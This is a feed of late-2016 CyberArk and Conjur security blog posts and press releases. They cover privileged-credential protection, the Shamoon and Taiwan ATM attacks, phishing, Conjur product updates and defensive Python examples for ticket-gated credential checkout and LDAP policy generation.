Misinformation—and the misuse of information—came to the fore of public attention during the 2016 U.S. presidential election. Exactly who was behind the well-publicized hackings, leaks and fake news stories, and their impact, remains under investigation and might not be known for months, if ever. However, what is clear is that the ability to use misinformation for political gain or otherwise will continue to be a significant cyber security issue in 2017 and beyond. In fact, concerns have already been raised about similar attacks on trust in connection with the German Parliament elections in 2017.

Ensuring the integrity of data and controlling its use is critical to maintaining trust not only in organizations, but in public institutions and leaders’ ability to make decisions.

It’s Not New

The use or control of information to sway public opinion or gain political or military advantage is not new. In a Washington Post opinion piece, John Maxwell Hamilton of the Woodrow Wilson Center for International Scholars dated the birth of information warfare to the opening days of the First World War when the British cut German undersea cables to disrupt communications. The theft and manipulation of information for espionage and propaganda is as old as warfare itself. The use of propaganda continues today.

What is new in information warfare is the proliferation of digital data that can be remotely accessed and manipulated as well as disseminated globally. Data has become not only a resource and an asset, but also a weapon as demonstrated during the presidential campaign with the release of stolen e-mails.

Add to that the proliferation of fake “news” stories, which often outperformed real news in social media. According to a survey by the Pew Research Center, 64 percent say fabricated news stories cause a great deal of confusion about the basic facts of current issues and events. In the same survey, 23 percent said they had shared fake stories – either knowingly or not.

This raises questions about the responsibility for protecting the integrity of data.

Manipulating the Data

Most of us (according to the Pew survey) are confident we can spot phony news. Sifting the real from the false is not always easy, however. A story about a love triangle with Elvis can be easily dismissed, but an article that shaves numbers off a political poll or the selective release of documents without context are more difficult to evaluate. Manipulating real data can be more insidious than making something up out of whole cloth.

A challenge of digital data is that it can be altered in ways that are difficult to detect. Data can be altered in servers and databases so that its owners are not even aware of the changes. When released or accessed under normal circumstances, this altered information can appear to be credible if available from a “trusted” source. Audio and video files can also be edited to deceive. Seeing and hearing are no longer believing, and as a result, trusted sources lose integrity.

The internet has blurred the distinction between publishers and readers/viewers. Phony or doctored information can be distributed globally at little cost and amplified through social media. Identifying the original source of falsified data or information can be difficult.

Defending our institutions

Defending ourselves and our institutions against misinformation requires a combination of personal skills and technology.

People must be media and information literate. Whether a baby boomer or a digital native, it is increasingly important to have the ability to evaluate the credibility of information and its sources. This requires a mix of critical thinking and enough knowledge/healthy skepticism to question things that just do not seem to be right. Understanding the nature of digital data and the challenges of cyber security contribute to these skills.

The creators, owners and distributors of data also have an obligation to integrity. Reputations are at stake, and the integrity of institutions could be damaged through a loss of public trust and confidence.

We have already written about the importance of data integrity as a part of a complete cyber security program. Basic practices such as encrypting data can help protect it, and hashing can help assure it has not been altered. Monitoring network activity and controlling access to privileged accounts that have permission to make changes in data also are critical.

Instilling trust in the data relied on to make decisions and protect citizens must be part of advanced cyber security strategies. Raising visibility of this challenge and spurring ongoing discussions will help maintain global awareness, even as elections fade from the front page.

Conjur Named a Top Cloud Security Solution Provider by Enterprise Security Magazine https://www.cyberark.com/blog/conjur-named-a-top-cloud-security-solution-provider-by-enterprise-security-magazine/ Tue, 20 Dec 2016 16:55:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-named-a-top-cloud-security-solution-provider-by-enterprise-security-magazine/  

WALTHAM, Mass., Dec. 20, 2016—Conjur, a trust management platform for the cloud, today announced that it has been named to Enterprise Security’s “Top 10 Cloud Security Solution Providers 2016” list. The award recognizes Conjur for its innovative trust management platform, which empowers DevSecOps teams to automatically implement secrets and access management policy for cloud infrastructure.

“It’s an honor to be included on this year’s list of top cloud security providers,” said Elizabeth Lawler, CEO and co-founder of Conjur. “Security is top of mind for today’s organizations as they increasingly move sensitive workloads to the cloud. Conjur’s trust management platform helps these organizations balance their goal of adopting cloud computing with their need to ensure security, so they can move forward to embrace today’s infrastructure and tools with confidence.”


Conjur was hand-picked by a panel of technology leaders to appear on the annual list. As profiled by Enterprise Security, “Conjur is transforming the way enterprises manage security as they embrace the cloud as a core component of their IT strategy. The cybersecurity company is making it easy for organizations to deploy whatever devops tools they want in hybrid and multi-cloud environments while still maintaining rigorous security controls over their dynamic infrastructure.”

Read Conjur’s full profile from the December 15 issue of Enterprise Security here.


About Conjur

Conjur delivers a trust forward software platform that enables organizations to balance their goal of adopting cloud computing with their need to ensure security. Conjur’s security orchestration software allows users to leverage the business systems that they already trust as they move forward with their cloud transformation initiatives by automating machine identity provisioning, authorization of privileged access, service account control, and machine-to-machine connectivity in a way that meets the needs of all DevSecOps stakeholders. Companies adopting dynamic, cloud-centric IT infrastructure across industries, including financial services, communications, media and software development, consider Conjur an essential component of their security strategy. Conjur is headquartered in Waltham, Mass., and is backed by Amplify Ventures, Avalon Partners and Koa Labs. For more information, please visit www.conjur.net or follow @conjurinc on Twitter.


About Enterprise Security

Enterprise Security Magazine is a technology magazine that provides information about security solutions that help organizations adapt to the radical changes taking place in their information security infrastructure. For more info, visit: http://www.enterprisesecuritymag.com/


Media Contact:
Lesley Sullivan
LaunchSquad
617-945-1915
conjur@launchsquad.com

CyberArk Privileged Account Security Includes Integrations with IT Ticket Management https://www.cyberark.com/blog/cyberark-privileged-account-security-includes-integrations-ticket-management/ Tue, 20 Dec 2016 14:30:06 +0000 https://www.cyberark.com/blog//

Need a new software program installed on your laptop? Call the help desk. Can’t get the VPN to work? Call the help desk. Spilled water on your computer? Call the help desk.

Depending on the size of the organization, an IT help desk can receive dozens, hundreds or even thousands of requests daily, so it’s no surprise that IT teams rely on ticket management solutions to address the workload, track cases and collaborate on tricky problems.

Ingrained within the IT department of many enterprise organizations, IT ticket management solutions typically track both the help desk’s response to standard user requests as well as administrative access to IT infrastructure when backend systems require attention. In effect, IT ticket management systems often become a single point of truth not only for the status of IT systems, but also for who is accessing those systems to fix reported issues.

And – you guessed it – the “who” is privileged users. To maintain and repair IT systems and applications, privileged users need access to privileged accounts. Yet, privileged accounts in the wrong hands, such as a malicious or careless user, could do serious damage. By integrating IT ticket management solutions with privileged account security solutions, organizations can effectively bridge the gap between authorization and account security, thus limiting exposure to advanced and insider attacks while extending existing access control workflows to new solutions. With an integrated solution, organizations are able to maintain a single point of truth while layering in proactive security controls to prevent the unauthorized re-use and abuse of privileged account credentials.

To help organizations reap the security and operational benefits of tightly integrated solutions, the CyberArk Privileged Account Security Solution now includes out-of-the-box integrations with BMC Remedy and ServiceNow IT Service Management. In addition to securing and managing the credentials used by privileged users, the CyberArk Privileged Account Security Solution can also protect access to the administrative consoles of IT ticket management systems, helping security teams ensure that the individuals entrusted with managing administrative access throughout the environment can, themselves, be trusted.
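As an added example (not CyberArk’s integration code and not the BMC Remedy or ServiceNow API), the following Python shows the kind of check such an integration performs when a privileged credential is requested: the credential is released only if the request cites an active ticket that is assigned to the requester, names the target system, and is still inside its work window, and every decision is written to an audit trail. Ticket identifiers, statuses, user and host names are constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

# Statuses in which a ticket still authorizes work. Constructed for this example;
# real ITSM systems use their own status vocabularies.
ACTIVE_STATUSES = {"open", "in_progress"}


@dataclass(frozen=True)
class Ticket:
    ticket_id: str
    status: str
    assignee: str      # engineer the ticket is assigned to
    target_host: str   # system the ticket authorizes work on
    opened_at: datetime
    expires_at: datetime


@dataclass
class Checkout:
    """Audit record for one credential check-out decision."""
    requester: str
    host: str
    ticket_id: str
    at: datetime
    granted: bool
    reason: str


# Constructed sample tickets (hypothetical ids and names, not from a real system).
T0 = datetime(2016, 12, 20, 9, 0, tzinfo=timezone.utc)
TICKETS: Dict[str, Ticket] = {
    "INC0001": Ticket("INC0001", "in_progress", "alice", "SRV-DB01", T0, T0 + timedelta(hours=8)),
    "INC0002": Ticket("INC0002", "resolved", "bob", "SRV-APP01",
                      T0 - timedelta(days=2), T0 - timedelta(days=1)),
    "INC0003": Ticket("INC0003", "open", "carol", "SRV-APP01", T0, T0 + timedelta(hours=4)),
}


def authorize_checkout(requester: str, host: str, ticket_id: str, now: datetime,
                       tickets: Dict[str, Ticket]) -> Tuple[bool, str]:
    """Decide whether a privileged credential for `host` may be released to `requester`.

    Every condition must hold: the ticket exists, is still active, is assigned to
    the requester, names this host, and the request falls inside its work window.
    """
    ticket = tickets.get(ticket_id)
    if ticket is None:
        return False, f"no such ticket {ticket_id}"
    if ticket.status not in ACTIVE_STATUSES:
        return False, f"ticket {ticket_id} is {ticket.status}, not active"
    if ticket.assignee != requester:
        return False, f"ticket {ticket_id} is assigned to {ticket.assignee}, not {requester}"
    if ticket.target_host != host:
        return False, f"ticket {ticket_id} covers {ticket.target_host}, not {host}"
    if not (ticket.opened_at <= now <= ticket.expires_at):
        return False, f"request at {now.isoformat()} is outside the window of {ticket_id}"
    return True, f"released under {ticket_id}"


class TicketGatedVault:
    """Minimal vault front door: credentials leave only with an authorizing ticket."""

    def __init__(self, tickets: Dict[str, Ticket]) -> None:
        self.tickets = tickets
        self.audit: List[Checkout] = []

    def checkout(self, requester: str, host: str, ticket_id: str, now: datetime) -> bool:
        granted, reason = authorize_checkout(requester, host, ticket_id, now, self.tickets)
        self.audit.append(Checkout(requester, host, ticket_id, now, granted, reason))
        return granted

    def denied(self) -> List[Checkout]:
        return [c for c in self.audit if not c.granted]


def run_demo() -> List[Checkout]:
    """Four constructed requests: one valid, three that the integration must refuse."""
    vault = TicketGatedVault(TICKETS)
    vault.checkout("alice", "SRV-DB01", "INC0001", T0 + timedelta(hours=1))   # granted
    vault.checkout("bob", "SRV-APP01", "INC0002", T0)                         # ticket already resolved
    vault.checkout("alice", "SRV-APP01", "INC0003", T0 + timedelta(hours=1))  # not the assignee
    vault.checkout("alice", "SRV-DB01", "INC0001", T0 + timedelta(hours=9))   # work window expired
    return vault.audit


if __name__ == "__main__":
    for rec in run_demo():
        print("GRANT" if rec.granted else "DENY ", rec.requester, rec.host, rec.reason)
```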

These new integrations are part of an ongoing effort by CyberArk to bring together leading technology vendors to help shared customers solve complex security challenges in an easier, more cost-effective way. Read about the C3 Alliance program and learn about CyberArk supported solutions and technology partnerships.

Technology Spotlight Examines the Impact of Securing Privileged Credentials on the Endpoint https://www.cyberark.com/blog/technology-spotlight-examines-impact-securing-privileged-credentials-endpoint/ Thu, 15 Dec 2016 14:51:10 +0000 https://www.cyberark.com/blog//

A new Technology Spotlight from independent analyst firm IDC highlights steps for securing privileged credentials as part of a proactive approach to hardening the endpoint against cyber attacks. Security and desktop operations teams will gain insight into the foundational elements of a comprehensive cyber security strategy to reduce the attack surface that includes endpoint protection. The Technology Spotlight, “Key Considerations for Securing Privilege on the Endpoint,”1 is sponsored by CyberArk.

The paper highlights the findings of data breach investigations that uncovered significant enterprise security risks associated with the exploitation of local administrator rights and account credential theft, and where existing, reactive endpoint security solutions can fall short in being able to detect and contain potential threats.

According to IDC, “the endpoint continues to be the focal point where criminals clash with IT defenders on a daily basis. Unfortunately, most organizations continue to invest in sophisticated malware detection technology without addressing endpoint security best practices. This leaves significant gaps that enable attackers to evade detection.”

Laptops and workstations are the attack vector most frequently used by malicious actors to gain initial access to the corporate network, making endpoint security a critical factor in an organization’s overall risk posture. Once an attacker has access to an endpoint and a local administrator account, escalating to further privileged credentials, moving laterally and taking over the full network is straightforward. Still, 62 percent of organizations have not yet taken steps to remove local administrator rights from the endpoint.

The paper explores how organizations can adopt endpoint security best practices, such as removing local administrator rights from the endpoint and implementing application controls, like greylisting, to delay and deter advanced threats. In addition, IDC recommends organizations:

  • Establish a formal patch management program to support a regular patching cycle for endpoint systems;
  • Implement strict password and account management policies, such as one-time use credentials, and enforcement mechanisms;
  • Adopt continuous monitoring and analytics solutions to detect and block credential theft at the endpoint in real time.

CyberArk Endpoint Privilege Manager, available as part of the CyberArk Privileged Account Security Solution, protects against advanced threats that exploit privileged credentials by interlocking three core capabilities: privilege management, application control and new credential theft detection and blocking to stop and contain damaging attacks at the endpoint.

CyberArk Endpoint Privilege Manager, previously CyberArk Viewfinity, delivers an additional layer of proactive protection by hardening the endpoint: it removes local administrator credentials, reducing risk while alleviating pressure on help desk support, and it enables flexible application control, allowing organizations to prevent malicious applications from executing and to use greylisting to run unknown applications in a restricted mode.

The Technology Spotlight, “Key Considerations for Securing Privilege on the Endpoint,” is available now for download.

 

1 – IDC Technology Spotlight, sponsored by CyberArk, “Key Considerations for Securing Privilege on the Endpoint,” December 2016, IDC # US41694116

 

]]>
The Most Fundamental Endpoint Security Problem is a Privilege Problem https://www.cyberark.com/blog/fundamental-endpoint-security-problem-privilege-problem/ Tue, 13 Dec 2016 16:40:51 +0000 https://www.cyberark.com/blog//

Privilege escalation is at the center of the cyber attack cycle. Why? Because attackers need the credentials of an insider, and administrative credentials give them the power to move laterally throughout the data center, to access high value servers and to take over domain controllers. Organizations now realize that securing privileged access is the first step they need to take to protect their organization from damaging cyber attacks, but it’s important to remember that privileged access is a security challenge across the entire IT infrastructure – not just the data center.

Privileged accounts exist in EVERY piece of technology in the organization: every server, every database, every application including SaaS, every domain controller, every hypervisor, and of course, every endpoint. Securing privileged access on the endpoint is just as important as securing privileged access to servers and domain controllers.

Ownership is Privilege

There are a number of reasons why privilege security at the endpoint is critical. I’ll keep it short and focus on one, very important concept – ownership of the endpoint. Privileged access provides a user with total control over the endpoint including the ability to decide who can do what on the machine. If control of the machine remains with a trusted systems administrator, the company controls it. The company retains “ownership” of the device. Once an attacker gains privileged access to an endpoint, s/he has total control over that machine. Ownership now belongs to the attacker. As a result, the attacker can decide who can access the machine, create and modify user accounts, change configuration settings, disable/uninstall anti-virus, install malware, reset local passwords, access data that belongs to others etc.

Microsoft’s Security Response Center’s 10 Immutable Laws of Security state this very clearly. There are multiple “laws” that articulate the need to secure admin credentials, but read #6 carefully:

A computer is only as secure as the administrator is trustworthy

“Every computer must have an administrator: someone who can install software, configure the operating system, add and manage user accounts, establish security policies, and handle all the other management tasks associated with keeping a computer up and running. By definition, these tasks require that the individual have control over the computer. This puts the administrator in a position of unequalled power.”

This also covers the authorized administrators that make mistakes or go rogue, as well as any unauthorized user or executable using an administrative credential.

Knowing this fact, it’s a mystery to me why organizations continue to add on layers of endpoint controls and detection without securing admin accounts. This most basic, but important, step in security control is missing.

Prioritize Privileged Account Security

Organizations have spent billions of dollars trying to protect their organizations from cyber attacks. Yet the number of attacks continues to grow. Industry benchmarks show cyber crimes cost an enterprise organization $15 million per year on average, with the overwhelming majority of attacks originating on the endpoint.

Attackers know that user log-ins are far easier points of infiltration than network or software exploits. Organizations try to train their employees not to click on malicious email, but phishing attempts persist and are increasingly sophisticated. Raising the bar for security literacy is a worthy endeavor in the digital age of business, but education will not contain an attack at the endpoint.

There will always be a new “threat du jour.” Taking a layered approach to security is smart, but there is no silver bullet. For this reason, it’s important to have measures in place to contain the damage of a breach and to mitigate risks. Remember the common denominator across every tool in your security toolbox: privileged accounts. For this reason and others, protecting privilege must be a priority.

CyberArk has focused on privileged account security for more than a decade, and we know what damage can be done when an attacker has access to privileged credentials. Some companies have learned the hard way – and locking down privileged credentials was among the first actions taken during remediation.

We continuously innovate our products to address market needs, and we recently introduced CyberArk Endpoint Privilege Manager to help organizations contain attackers early in the lifecycle by interlocking three core capabilities: privilege management, application control and new targeted credential theft detection. The goal is to stop and contain damaging attacks at the endpoint. Instead of adding layers of preventative endpoint security controls on a weak foundation, we offer a different, proactive approach.

We invite you to learn more here.

]]>
Conjur 4.8 Released Delivering Enterprise-Scale Deployment Capabilities https://www.cyberark.com/blog/conjur-4-8-released-delivering-enterprise-scale-deployment-capabilities/ Wed, 07 Dec 2016 16:41:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-4-8-released-delivering-enterprise-scale-deployment-capabilities/  

We’re pleased to announce the immediate availability of Conjur 4.8. Over the past couple of years, as Conjur has been deployed broadly with large enterprise customers, we have had a number of requests for features to make it easier for them to manage their expanded use of the software. This latest release delivers a set of capabilities that respond to these needs and will further enable our customers and prospects to deploy Conjur broadly and manage it more easily.


What’s new:

Improved High Availability

The Conjur Trust Management Platform is a critical piece of our customers’ cybersecurity infrastructure, and they require that their Conjur environment be highly available, fault-tolerant and scalable to their needs. To that end, we have included a number of updates in v4.8.0 that make it easier to launch and maintain Conjur clusters.


For customers running on AWS, we now provide CloudFormation templates to create the infrastructure needed. Server health checks now include information about free disk space and inodes. The workflow for bringing your own certificates and private keys has been improved. Finally, a load balancer is no longer needed for cluster setup.

Conjur Cluster Health Monitoring

We’ve also added a Cluster Dashboard to the UI. This dashboard shows the role and status of every node in your Conjur cluster so that you can monitor the health of the distributed Conjur platform through a single console.


Improved LDAP Sync Workflow

We introduced LDAP Sync in the v4.7.0 release. Most large companies have an existing LDAP or Active Directory environment. LDAP Sync synchronizes users and groups from LDAP/AD with Conjur at a user-specified interval. A lot of work has gone into LDAP Sync for the v4.8.0 release to make it faster, easier to use, and more reliable.

The new workflow for LDAP Sync starts with configuring your LDAP/AD connection and filters in the Conjur UI.


After successfully configuring and verifying LDAP Sync settings, a Conjur Policy file is generated that can be loaded into Conjur.

---
- !policy
  id: ad-acme
  body:
    - !user
      id: Administrator
      annotations:
        ldap-sync/source: ad-ec2
        ldap-sync/upstream-dn: CN=Administrator,CN=Users,DC=acme,DC=org
    - !user
      id: Guest
      annotations:
        ldap-sync/source: ad-ec2
        ldap-sync/upstream-dn: CN=Guest,CN=Users,DC=acme,DC=org

The policy can now be loaded into Conjur. Major benefits of using Conjur Policy in the new LDAP Sync workflow include increased sync speeds, the ability to handle very large LDAP/AD environments, and familiar tooling for Conjur users.
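To make the generated-policy step concrete, here is an added example (not Conjur’s own generator) that renders the same policy layout from LDAP/AD entries; the entries, the base DN and the source name are constructed, and the quoting and base-DN checks are assumptions about what a careful generator should do.

```python
"""Generate a Conjur v4 LDAP Sync policy from LDAP/AD entries.

Added example for this post, not Conjur's own generator: it produces the same
layout as the policy above (a !policy whose body holds !user records annotated
with ldap-sync/source and ldap-sync/upstream-dn). The LDAP entries are
constructed; a real run would take them from an LDAP search result.
"""
import re

# Constructed sample: entries an LDAP search under the sync base DN might return.
SAMPLE_ENTRIES = [
    {"dn": "CN=Administrator,CN=Users,DC=acme,DC=org", "cn": "Administrator"},
    {"dn": "CN=Guest,CN=Users,DC=acme,DC=org", "cn": "Guest"},
]

# Characters accepted in an unquoted YAML plain scalar here; anything else
# (colons, '#', quotes, a leading '-' or '!') is double-quoted so an odd CN
# cannot alter the policy structure or be read as a YAML tag.
_PLAIN_OK = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.,=@/\- ]*$")


def yaml_scalar(value: str) -> str:
    """Emit value as a YAML scalar, double-quoting it unless it is safely plain."""
    if _PLAIN_OK.match(value):
        return value
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def dn_components(dn: str) -> list:
    """Split a DN into RDNs. Simplification: escaped commas ('\\,') are not handled."""
    return [part.strip() for part in dn.split(",")]


def is_under_base(dn: str, base_dn: str) -> bool:
    """True when dn lies strictly beneath base_dn (RDNs compared case-insensitively)."""
    d = [c.lower() for c in dn_components(dn)]
    b = [c.lower() for c in dn_components(base_dn)]
    return len(d) > len(b) and d[-len(b):] == b


def build_policy(policy_id: str, source: str, base_dn: str, entries: list) -> str:
    """Render the policy text. Entries outside base_dn or with duplicate ids are
    rejected rather than silently creating a user the sync filter never asked for."""
    lines = ["---", "- !policy", f"  id: {yaml_scalar(policy_id)}", "  body:"]
    seen = set()
    for entry in entries:
        if not is_under_base(entry["dn"], base_dn):
            raise ValueError(f"entry outside sync base {base_dn}: {entry['dn']}")
        user_id = entry["cn"]
        if user_id in seen:
            raise ValueError(f"duplicate Conjur user id: {user_id}")
        seen.add(user_id)
        lines += [
            "    - !user",
            f"      id: {yaml_scalar(user_id)}",
            "      annotations:",
            f"        ldap-sync/source: {yaml_scalar(source)}",
            f"        ldap-sync/upstream-dn: {yaml_scalar(entry['dn'])}",
        ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(build_policy("ad-acme", "ad-ec2", "DC=acme,DC=org", SAMPLE_ENTRIES))
```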

Integrated Conjur UI

Until now, separate containers were required to deploy the Conjur appliance and the Conjur UI. We are pleased to announce that the Conjur UI is now integrated into the Conjur appliance image. This means that you can now open the HTTPS endpoint of any node in your Conjur cluster to view the Conjur UI. Deploying a separate Conjur UI container is no longer necessary.


This was an overview of the major new updates for Conjur v4.8.0. This release also contains many other improvements and bugfixes. See the full release notes for a detailed list of all updates in this release.  Existing customers can contact support@conjur.net to upgrade.

 

]]>
Phishing – A Threat for Sure, But the Biggest We Face? Not So Fast! https://www.cyberark.com/blog/phishing-threat-sure-biggest-face-not-fast/ Mon, 05 Dec 2016 15:00:13 +0000 https://www.cyberark.com/blog//

With the recent reports of email hacking of the DNC and Clinton campaign, it’s understandable that phishing is having its moment in the cyber security spotlight.

According to a recent Fortune article, Homeland Security Secretary Jeh Johnson, noted, “The most devastating attacks by the most sophisticated attackers almost always begin with the simple act of spear-phishing.”

Phishing, when used as a tactic, is the first of multiple steps in a cyber attack, and by itself, inflicts no harm. It allows an attacker to penetrate perimeter defenses and set up a base of operation inside the network, but at the end of the phishing stage of an attack, no damage has been done. Nothing has been stolen. No IT systems have sustained any damage. It’s simply a point of entry.

Of course it is always better to keep an attacker outside of your network if you can. But, recognizing the difficulty of that, many companies today operate as if a breach has already occurred (or will). Just because an attacker got inside doesn’t mean they have done any damage. To do that, the attacker needs credentials and the ability to move laterally, which requires additional steps.

To access all of a user’s emails, attackers still need to steal the user’s email credentials. To execute a ransomware attack, the bad guys need to install and execute a malicious application.  To access a server with tens of thousands of credit card accounts, they need to get beyond their initial base of operation, move laterally across the network, and capture administrative credentials that provide the necessary access to the credit card data.

The same Fortune article noted above quotes Manhattan District Attorney Cyrus Vance:  “Phishing—mundane as it is—is the biggest threat we face and need to tackle.”

Mundane? Yes, because organizations should practice basic standards of cyber hygiene and there are proven ways to stop an attacker from advancing after a user has been phished. In fact, this is where real security strategies need to kick in. Least privilege controls on endpoints can be very effective at preventing the installation of ransomware and other malicious applications. Privileged account security can prevent attackers from accessing the credentials necessary to gain access to servers, domain controllers or industrial control systems.

With security controls readily available to stop an attack from advancing, it’s hard for me to agree that phishing is the biggest threat we need to tackle. For the record, my vote goes to protecting our energy grid and water supply.

But, if phishing has the C-Suite and others engaged in a dialogue about cyber security, then consider it a teachable moment. Explain what controls your organization has in place to contain a breach and break the attack chain. If your organization hasn’t reached table stakes, identify the resources and support needed to raise the bar on your security controls. Ultimately, privileged accounts need to be managed and protected. Make it your priority today.

 

]]>
Shamoon Attack Reinforces Risks of Privileged Credential Compromise https://www.cyberark.com/blog/shamoon-attack-reinforces-risks-privileged-credential-compromise/ Thu, 01 Dec 2016 17:06:20 +0000 https://www.cyberark.com/blog//

Malware like Shamoon is analogous to finding an unexploded WWII bomb in the ground. It’s been seemingly dormant for years, but when uncovered, it remains incredibly dangerous with the potential to devastate. Agile cyber attackers have become expert at reconstituting old weaponry for new attacks – we can expect this trend to continue throughout 2017.

While it’s natural to focus on the devastation malware like this can cause, understanding the pathway the malware had to travel is key to mitigation. According to the reports, the malware contained embedded credentials that allowed it to surreptitiously move throughout the network and plant its logic bombs. In this case, the attack was likely initiated using a worm, which is how Shamoon operated historically. Propagation can occur by accessing shares in the network or through other remote access, using stolen credentials. Another possible way to gain this access network-wide is through group policy object (GPO) configuration from the Domain Controller that is distributed to domain-connected machines.

Frustratingly, this pattern of privileged credential compromise continues to be repeated – consider attacks like the ones impacting the Ukraine power grid, Bangladesh Bank, The Sands Hotel and more. Hijacked administrator credentials enable attackers to enter the network undetected and they continue to elevate those privileges until they find a landing point to inflict maximum damage.

When Shamoon first wreaked havoc on Saudi Aramco in 2012, ICS-CERT immediately issued strategic mitigation steps to specifically prevent Shamoon-based attacks. The mitigation strategies highlighted the importance of controlling access and management of privileged accounts. This is very similar to the alert the FBI recently issued that prioritized privileged credential protection.

These steps are known best practices in the security industry. The reality we face is that while we pay lip service to enacting security best practices, bad habits persist. Our recent research shows that as many as 40% of organizations still store privileged and admin passwords in word docs or spreadsheets. Failing to secure these accounts is an open door to attackers to unleash their malware across a network.

We can expect more attacks that reconstitute old malware, but we can’t persist in the same security mindset. We need to assume cyber attackers are already on the network and planning attacks with increasingly malicious intent. By shutting down the privileged pathway of malware like Shamoon, organizations can build virtual blast chambers that contain the damage a ‘digital bomb’ can cause.

 

]]>
Application Credentials: The Hidden Attack Pathway into Your Organization https://www.cyberark.com/blog/application-credentials-hidden-attack-pathway-organization/ Thu, 01 Dec 2016 14:21:40 +0000 https://www.cyberark.com/blog//

Today, it’s well understood that credentials belonging to IT administrators, business users, partners and others with high levels of network access are critical for gaining unauthorized access to key systems, and ultimately, the heart of the enterprise. As we’ve explored previously, too many organizations continue to equate privileged credentials with IT administrators alone. The reality is that privileged access is not limited to users with a “heartbeat.”

Every day, countless applications across the enterprise use privileged credentials to connect to sensitive resources. Sought after and exploited by cyber attackers when left unprotected, these application credentials include SSH keys and hard-coded, embedded passwords. Many privileged credentials accessed by applications are often not well managed, secured or even tracked for a number of reasons. Though IT security teams increasingly realize the importance of shoring up the security of privileged credentials used by applications, the process can understandably seem to be complex, time-consuming and overwhelming.

The key to implementing an effective privileged account security program for applications is to create a comprehensive, long-term plan, but to start small. Tackling the initiative piece-by-piece will help your IT security team to mitigate risk, build repeatable processes and demonstrate “quick wins” that will help garner further support from key stakeholders.

To do this, it’s important to understand that not all applications are created equal; most enterprise applications can be classified into two distinct tiers based on both their availability level and risk level:

  • Tier 1: Business/mission-critical, high availability applications, such as consumer-facing web applications, are integral to an organization’s operations, and if they fail they can cause significant financial or reputational damage. They often enable access to an organization’s most sensitive resources, and as such, need to be protected and available 24x7x365.
  • Tier 2: These applications are also critical to an organization’s operations, yet do not need to be “always on.” For example, scripts or applications that perform simple, often automated tasks, such as running a scheduled backup script on Windows.

CyberArk Application Identity Manager™ offers a variety of flexible deployment options to protect privileged credentials linked to each application tier. This gives organizations the ability to approach privileged account security initiatives in manageable pieces—beginning with a specific kind of application, such as Commercial Off the Shelf (COTS) applications or J2EE application servers (such as IBM WebSphere, Oracle WebLogic, JBoss and Tomcat), then scaling over time as program milestones are successfully completed.

Our recent eBook, “An Attack Pathway into Your Organization? There’s an App for That,” explores these deployment options in detail, while offering actionable recommendations for improving privileged credential security, management and compliance. We invite you to download the eBook here.

]]>
With ATM Attacks in Taiwan, History Repeats…Again https://www.cyberark.com/blog/atm-attacks-taiwan-history-repeats/ Wed, 30 Nov 2016 15:22:51 +0000 https://www.cyberark.com/blog//

In 2014 and 2015 there were the Carbanak attacks, which netted cyber criminals upwards of $1 billion from global financial institutions. In 2016, the Buhtrap gang collected $2.6 million from bank-owned ATMs in Taiwan in just two days and that resulted in over $300 million in losses. The next crime ring may be different, but the tactics and goals of the attack will likely be similar. By understanding tactics used in previous attacks, financial institutions can take proactive steps to break the attack chain.

As reported, attackers linked to the Buhtrap gang gained access to banks throughout Taiwan and Thailand by using phishing emails that appeared to be from ATM vendors and other banks. When the bank employees opened these emails – and their attachments – the attackers got in.

In the case of First Commercial Bank of Taiwan, the attackers first broke in by compromising a user in the London office via phishing, and then they exploited that insider access to move freely through the network until they gained the level of privileged access needed to issue a malicious software update to the bank’s ATMs. That planted malware later enabled attackers to dispense $2.6 million from infected ATMs in two days.

Based on what is currently known about these recent attacks, as well as what we know about the previous Carbanak attacks, here are five steps financial institutions can take to reduce the risk of becoming the next victim:

  1. If it’s End of Support, it’s time for an upgrade. Windows XP has been the backbone of ATMs for a decade, and it reached End of Support (EOS) in April 2014. This means there are no more security updates. Yet, a year after EOS, 75 percent of ATMs still ran Windows XP. Make the criminals work for their paycheck. A cyber attack is far more costly than an upgrade.
  2. Patch, patch, patch. Whether it’s your ATMs, financial systems, IT infrastructure or endpoints, don’t give attackers an open invitation into your network.
  3. Default-deny can be your friend. Though the malware planted on First Commercial Bank’s ATMs was issued through a software update, not all attacks are this sophisticated or coordinated. Many ATM malware attacks are executed via physical access and can often be blocked with a “default-deny” approach to application control.
  4. Lock down privileged accounts that enable administrative access. Determine who has access to your software distribution systems. Identify which employees and vendors are authorized to update and administer ATMs and financial systems. These users – and their accounts – are prime targets for highly motivated cyber criminals.
  5. Block and contain the attack as early as possible. There are a range of security controls that can help you to proactively prevent cyber criminals from gaining access to financial systems, ATMs, software distribution systems and other critical systems. Control applications on endpoints, remove local admin rights from standard users, and lock down privileged accounts throughout your environment. These three steps can help you limit an attacker’s ability to establish a foothold inside your network and prevent lateral movement if they’re able to get inside.

]]>
Conjur Selected for Springboard; Joins Expert Network of Women-Led Enterprise Technology & Healthcare Companies https://www.cyberark.com/blog/conjur-selected-for-springboard-joins-expert-network-of-women-led-enterprise-technology-healthcare-companies/ Tue, 29 Nov 2016 16:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-selected-for-springboard-joins-expert-network-of-women-led-enterprise-technology-healthcare-companies/  

Press Release:

Today, Conjur, a trust management platform for the cloud, announced that it has been selected to join the Springboard Expert Network, a group of influencers, investors and innovators dedicated to building high growth companies led by women. Conjur is one of only 15 women-led enterprise technology and digital healthcare companies invited to join.

“We’re in the midst of one of the most important technology shifts in the history of business as organizations move to the cloud. At the same time, the IT industry is starting to release another source of untapped potential as it becomes more inclusive of women in leadership roles,” said Elizabeth Lawler, CEO and co-founder of Conjur. “On behalf of our company, I gratefully accept Springboard’s invitation, which I am confident will help us accelerate our mission to help organizations balance innovation with security as they adopt cloud services.”

Since 2000, Springboard has become a human capital powerhouse connecting early-stage healthcare and technology-oriented companies with investors, advisors and lucrative business opportunities. Conjur joins the ranks of globally recognized brands such as Zipcar, Constant Contact, iRobot, Blurb and MinuteClinic, all of which are or were led or founded by women and are part of the Springboard portfolio.

“Investors say they like to bet on the jockey not the horse,” said Kay Koplovitz, co-founder of Springboard Enterprises and managing director of Springboard Growth Capital. “This year we are betting our human capital on an impressive group of experienced entrepreneurial women who will not only benefit from the talent in our expert network, but also add immeasurably to it.”

About Conjur
